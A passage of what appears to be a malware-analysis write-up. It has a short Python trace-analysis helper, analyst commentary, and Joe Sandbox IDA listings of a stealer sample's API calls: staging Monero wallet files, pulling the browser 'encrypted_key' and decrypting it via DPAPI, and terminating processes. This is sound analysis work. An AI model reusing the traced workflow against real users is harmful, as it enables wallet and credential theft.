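    print("copy/delete pairs:", find_copy_then_delete(calls))
    print("wallet paths:", wallet_references(calls))
```

The mask expands to KEY_READ | KEY_WOW64_64KEY. Requested from a 32-bit process (the 8-digit addresses in this listing indicate one), KEY_WOW64_64KEY bypasses registry redirection and reads the native 64-bit view of HKEY_LOCAL_MACHINE rather than WOW6432Node, which is the usual choice when a stealer wants the real machine identifiers. The copy-then-delete pairing is the file-staging shape to look for in a host timeline: the wallet file is copied somewhere writable, read back (the lstrlen calls), and the staged copy is removed.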
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C48B60: GetSystemTime.KERNEL32(00C50E1A,019FE738,00C505AE,?,?,00C313F9,?,0000001A,00C50E1A,00000000,?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C48B86
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C3D481
                                • lstrlen.KERNEL32(00000000), ref: 00C3D698
                                • lstrlen.KERNEL32(00000000), ref: 00C3D6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 00C3D72B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 46a440ef283b77768bfd31f00eb3311d55b85adf028c13aa51d6d5f58d19c737
                                • Instruction ID: a38e6b5555c82d73054e6f91391e463e3e123c6ca4d1d4f5fff4c61b2c1961ce
                                • Opcode Fuzzy Hash: 46a440ef283b77768bfd31f00eb3311d55b85adf028c13aa51d6d5f58d19c737
                                • Instruction Fuzzy Hash: 3A912D72850108ABEB04FBA0DC96EEE7338FF54304F544569F517B6092EF346A49EB62
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C48B60: GetSystemTime.KERNEL32(00C50E1A,019FE738,00C505AE,?,?,00C313F9,?,0000001A,00C50E1A,00000000,?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C48B86
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C3D801
                                • lstrlen.KERNEL32(00000000), ref: 00C3D99F
                                • lstrlen.KERNEL32(00000000), ref: 00C3D9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 00C3DA32
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: f9234e9bd46cec9cf839bdda07d9ba2ba9c14a8e33b8e241be8001822baa8316
                                • Instruction ID: f04fc69fbe30e0bccd10caf7b993fddd4b57d1c4bc99ad49986d468c465dba4b
                                • Opcode Fuzzy Hash: f9234e9bd46cec9cf839bdda07d9ba2ba9c14a8e33b8e241be8001822baa8316
                                • Instruction Fuzzy Hash: 0D812E728501089BEB04FBA1DC96EEE7338FF54304F554528F407B6092EF346A49EBA2
                                APIs
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                  • Part of subcall function 00C399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C399EC
                                  • Part of subcall function 00C399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C39A11
                                  • Part of subcall function 00C399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C39A31
                                  • Part of subcall function 00C399C0: ReadFile.KERNEL32(000000FF,?,00000000,00C3148F,00000000), ref: 00C39A5A
                                  • Part of subcall function 00C399C0: LocalFree.KERNEL32(00C3148F), ref: 00C39A90
                                  • Part of subcall function 00C399C0: CloseHandle.KERNEL32(000000FF), ref: 00C39A9A
                                  • Part of subcall function 00C48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C48E52
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00C51580,00C50D92), ref: 00C3F54C
                                • lstrlen.KERNEL32(00000000), ref: 00C3F56B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 998311485-3310892237
                                • Opcode ID: 1e476ab8d7d0bd48c93b396a5dea98538ee34b9c98bde0cab58ebeb4974e55e2
                                • Instruction ID: af261310c5c3a5a77d9b7c54125c4e5e3a1d0a6b85725219e5bff4930ca2f9ab
                                • Opcode Fuzzy Hash: 1e476ab8d7d0bd48c93b396a5dea98538ee34b9c98bde0cab58ebeb4974e55e2
                                • Instruction Fuzzy Hash: 5B512076D50108AAEB14FBB0DC96EED7338FF54304F508528F816A7191EE346A0DDBA2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: debb1566baa97ce123c18f01488e51d43b305b290b341d96f6b057c8fcd9c629
                                • Instruction ID: f365d59d77cd242cf1ab20980e89586a72a8bf7ad9f570503d9d44fff64cbe04
                                • Opcode Fuzzy Hash: debb1566baa97ce123c18f01488e51d43b305b290b341d96f6b057c8fcd9c629
                                • Instruction Fuzzy Hash: 26414F75D10109AFDB04EFE5D845AEEB774BF94304F108028F416B6291DB34AA49DFA2
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C399EC
                                  • Part of subcall function 00C399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C39A11
                                  • Part of subcall function 00C399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C39A31
                                  • Part of subcall function 00C399C0: ReadFile.KERNEL32(000000FF,?,00000000,00C3148F,00000000), ref: 00C39A5A
                                  • Part of subcall function 00C399C0: LocalFree.KERNEL32(00C3148F), ref: 00C39A90
                                  • Part of subcall function 00C399C0: CloseHandle.KERNEL32(000000FF), ref: 00C39A9A
                                  • Part of subcall function 00C48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C48E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C39D39
                                  • Part of subcall function 00C39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39AEF
                                  • Part of subcall function 00C39AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00C34EEE,00000000,?), ref: 00C39B01
                                  • Part of subcall function 00C39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39B2A
                                  • Part of subcall function 00C39AC0: LocalFree.KERNEL32(?,?,?,?,00C34EEE,00000000,?), ref: 00C39B3F
                                  • Part of subcall function 00C39B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C39B84
                                  • Part of subcall function 00C39B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00C39BA3
                                  • Part of subcall function 00C39B60: LocalFree.KERNEL32(?), ref: 00C39BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: 5be1af16dde599473640e5b7d37a751ea3a6ba4bb955170a50733438210a46c2
                                • Instruction ID: 4748fd46819bec1a2ce0d2d3f296f1019f13b5f46a40b483dc2b4ceb460e0311
                                • Opcode Fuzzy Hash: 5be1af16dde599473640e5b7d37a751ea3a6ba4bb955170a50733438210a46c2
                                • Instruction Fuzzy Hash: B93132B6D10209ABCF14EFE4DC86AEFB7B8FF48304F144519E915A7241E7749A44CBA1
                                APIs
                                • memset.MSVCRT ref: 00C494EB
                                  • Part of subcall function 00C48D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00C4951E,00000000), ref: 00C48D5B
                                  • Part of subcall function 00C48D50: RtlAllocateHeap.NTDLL(00000000), ref: 00C48D62
                                  • Part of subcall function 00C48D50: wsprintfW.USER32 ref: 00C48D78
                                • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00C495AB
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C495C9
                                • CloseHandle.KERNEL32(00000000), ref: 00C495D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                • String ID:
                                • API String ID: 3729781310-0
                                • Opcode ID: 3d04da0ef6907293bfd6fbf29f7609637b1e5a4fcaa5eeca87aa6b054f63b7c2
                                • Instruction ID: 217f20c566fcb40dc5695c63ba5f6b11441086eadb25ffc7049aab12cc860e70
                                • Opcode Fuzzy Hash: 3d04da0ef6907293bfd6fbf29f7609637b1e5a4fcaa5eeca87aa6b054f63b7c2
                                • Instruction Fuzzy Hash: C3312D71E002189FDB14DFD0DD49BEEB778FB44301F204559E50AAB184DB74AA89DF52
                                APIs
                                • CreateFileA.KERNEL32(00C43AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00C43AEE,?), ref: 00C492FC
                                • GetFileSizeEx.KERNEL32(000000FF,00C43AEE), ref: 00C49319
                                • CloseHandle.KERNEL32(000000FF), ref: 00C49327
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID:
                                • API String ID: 1378416451-0
                                • Opcode ID: 515bd4437c4a50d7a345800a6e330572585ae7880cf51144099f61ea5d6c81f3
                                • Instruction ID: 2277789b53770941a03dd3b35199270ebae4cf68e187e099538ad6f4d8a757f7
                                • Opcode Fuzzy Hash: 515bd4437c4a50d7a345800a6e330572585ae7880cf51144099f61ea5d6c81f3
                                • Instruction Fuzzy Hash: C4F08C34E00208BBDB14DFB2DC09F9E77B9FB88310F108264F615A72D0D6B09A408B40
                                APIs
                                • __getptd.LIBCMT ref: 00C4C74E
                                  • Part of subcall function 00C4BF9F: __amsg_exit.LIBCMT ref: 00C4BFAF
                                • __getptd.LIBCMT ref: 00C4C765
                                • __amsg_exit.LIBCMT ref: 00C4C773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00C4C797
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 4bf42fa9fba0af9802959377501668b702a2d2487f02f230a2c286a730d6724f
                                • Instruction ID: 994f39696713609104a44481666c284bf6efe334322f166e93afc557959fc58e
                                • Opcode Fuzzy Hash: 4bf42fa9fba0af9802959377501668b702a2d2487f02f230a2c286a730d6724f
                                • Instruction Fuzzy Hash: AEF0B4369427009BE760BBF8588775E37A07F00721F204149F814A61E3DB649D80BE56
                                APIs
                                  • Part of subcall function 00C48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C48E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00C44F7A
                                • lstrcat.KERNEL32(?,00C51070), ref: 00C44F97
                                • lstrcat.KERNEL32(?,019F8958), ref: 00C44FAB
                                • lstrcat.KERNEL32(?,00C51074), ref: 00C44FBD
                                  • Part of subcall function 00C44910: wsprintfA.USER32 ref: 00C4492C
                                  • Part of subcall function 00C44910: FindFirstFileA.KERNEL32(?,?), ref: 00C44943
                                  • Part of subcall function 00C44910: StrCmpCA.SHLWAPI(?,00C50FDC), ref: 00C44971
                                  • Part of subcall function 00C44910: StrCmpCA.SHLWAPI(?,00C50FE0), ref: 00C44987
                                  • Part of subcall function 00C44910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C44B7D
                                  • Part of subcall function 00C44910: FindClose.KERNEL32(000000FF), ref: 00C44B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: 7cd64bb149e9b66fe3c54104f1f32c55f9cad3a85358aa09f63c48e5ebc9601f
                                • Instruction ID: 52b1df0c69e02c2933c3781432a8111e84693c638d8ab6839c414c0d62f55108
                                • Opcode Fuzzy Hash: 7cd64bb149e9b66fe3c54104f1f32c55f9cad3a85358aa09f63c48e5ebc9601f
                                • Instruction Fuzzy Hash: ED219876900208AFD754FBB0DC46EED333CBB94701F044564BA5DA2181EE749ACC9BA3